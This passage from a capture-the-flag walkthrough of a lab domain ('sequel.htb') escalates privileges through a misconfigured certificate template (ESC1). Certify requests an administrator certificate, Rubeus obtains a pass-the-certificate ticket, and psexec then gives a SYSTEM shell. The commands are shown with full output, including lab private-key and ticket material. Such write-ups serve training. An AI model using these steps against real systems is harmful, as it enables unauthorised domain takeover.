It finds the vulnerable template `UserAuthentication` as well.  
We'd have to deduce ESC1 on our own, though.

Now, we need to request a certificate with `subjectAltName` set to `administrator` or another high-privilege user:

```console
PS C:\> Invoke-Certify request /ca:'dc.sequel.htb\sequel-DC-CA' /template:UserAuthentication /altname:administrator 

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Request a Certificates

[*] Current user context    : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.

[*] Template                : UserAuthentication
[*] Subject                 : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb 
[*] AltName                 : administrator

[*] Certificate Authority   : dc.sequel.htb\sequel-DC-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 14

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA3Co0Vzdad+2VOLOlcmugKbg1Znq6nQum+1iSttHeL7acL2ry
05GmKyEMhv7VvWbtL5m8giVqMLtzjsMbtDlnwaTnnsLanSoJb6+jvt/xnFRZD/uT
TIrOceIbkHSGvc8CxyBOPHikovrTi3EiH6E50Jz7ySkr7xTrh8HJgb0f5q8XnuP+
[--SNIP--]
e09K/aa4k+ajaPSy0n1ntqE9ZA1gTfA3S2ip/aP4s7+tCnreh12UYT7q/TJg19f4
jViRdI6KOszo6r0ow1seO9yXtFH0cpzQ0P+v/ArEdNGhpby1Ycow
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGEjCCBPqgAwIBAgITHgAAAA515S7LGI7bEgAAAAAADjANBgkqhkiG9w0BAQsF
ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
[--SNIP--]
V7pzFJmjupartakW5Ihe4z2sByrfTWH/UMsjv/bYwfQ8wX/JgcYcjvw48M6mbnOb
4NR6nmYbs2kufpVCpyzIZDAHBJwPdQ==
-----END CERTIFICATE-----


[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
```

Now, we can do as it says to convert the PEM certificate to PFX. We need to copy the `-----BEGIN RSA PRIVATE KEY----- ... -----END CERTIFICATE-----` section to a file on our attack VM first.

```console
opcode@parrot$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
```

There's no password; it's empty.  
Now we can transfer this pfx to the box and use pass-the-certificate with Rubeus to get administrator's TGT:

```console
PS C:\Windows\Tasks> .\Rubeus.exe asktgt /user:administrator /certificate:'C:\Windows\Tasks\cert.pfx' /nowrap

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.3

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\administrator'
[*] Using domain controller: fe80::51fe:f742:ce60:a56c%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIGSDCCBkSgAwIBBaEDAgEWooIFXjCCBV[--SNIP--]gAwIBAqEWMBQbBmtyYnRndBsKc2VxdWVsLmh0Yg==

  ServiceName              :  krbtgt/sequel.htb
  ServiceRealm             :  SEQUEL.HTB
  UserName                 :  administrator
  UserRealm                :  SEQUEL.HTB
  StartTime                :  6/27/2023 5:25:18 PM
  EndTime                  :  6/28/2023 3:25:18 AM
  RenewTill                :  7/4/2023 5:25:18 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable
  KeyType                  :  rc4_hmac
  Base64(key)              :  bvFakJguqyCF75uRTXnHiA==
  ASREP (key)              :  B53785C206935EAB85F89DF301554E10

```

We can copy the `kirbi` ticket to parrot, base64 decode it, and convert it to `ccache`:

```console
opcode@parrot$ ticketConverter.py administrator.kirbi administrator.ccache
```

Once again, we can use `psexec` and get shell as system:

```console
opcode@parrot$ export KRB5CCNAME=administrator.ccache
opcode@parrot$ psexec.py -no-pass -k sequel.htb/administrator@dc.sequel.htb
```
